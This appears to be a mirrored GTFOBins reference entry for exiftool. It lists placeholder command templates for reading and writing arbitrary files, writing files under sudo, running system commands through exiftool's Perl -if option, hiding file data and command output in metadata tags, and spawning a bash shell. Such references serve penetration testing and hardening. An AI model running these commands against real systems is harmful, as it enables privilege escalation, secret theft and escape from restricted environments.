mirror/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-14 11:21:33 +01:00
Code Issues
de953c725e
GTFOBins.github.io/_gtfobins/exiftool.md
Alexey Zhuchkov dd497c2190 Add more exiftool commands
2025-02-01 14:20:35 +03:00

1.4 KiB
Raw Blame History

description: | If the permissions allow it, files are moved (instead of copied) to the destination. functions: file-read: - code: | LFILE=file_to_read OUTPUT=output_file exiftool -filename=$OUTPUT $LFILE cat $OUTPUT - description: Exfiltrate file data via metadata tags code: | LFILE=file_read INPUT=input_file exiftool "-description<=$LFILE" --filename $INPUT file-write: - code: | LFILE=file_to_write INPUT=input_file exiftool -filename=$LFILE $INPUT - description: Write file from metadata tag's content code: | LFILE=file_to_write INPUT=input_file exiftool -description -W $LFILE --filename $INPUT sudo: - code: | LFILE=file_to_write INPUT=input_file sudo exiftool -filename=$LFILE $INPUT command: - code: | COMMAND=command_to_execute INPUT=input_file exiftool -if "system('$COMMAND');1" --filename $INPUT - description: Run system command and exfiltrate result via metadata tags code: | COMMAND=command_to_execute INPUT=input_file exiftool -userparam "inj=Test" -if "$$self{OPTIONS}{UserParam}{inj}=`$COMMAND`;1" '-description<$inj' --filename $INPUT shell: - code: | INPUT=input_file exiftool -if "system('bash')" $INPUT